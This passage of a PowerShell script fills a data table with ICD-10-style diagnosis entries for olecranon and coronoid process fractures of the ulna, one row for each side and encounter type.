intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of right ulna","Displaced fracture of olecranon process with intraarticular extension of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of left ulna","Displaced fracture of olecranon process with intraarticular extension of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process with intraarticular extension of unspecified ulna","Displaced fracture of olecranon process with intraarticular extension of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of right ulna","Nondisplaced fracture of olecranon process with intraarticular extension of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of left ulna","Nondisplaced fracture of olecranon process with intraarticular extension of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process with intraarticular extension of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of right ulna","Displaced fracture of coronoid process of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of left ulna","Displaced fracture of coronoid process of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coronoid process of unspecified ulna","Displaced fracture of coronoid process of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = 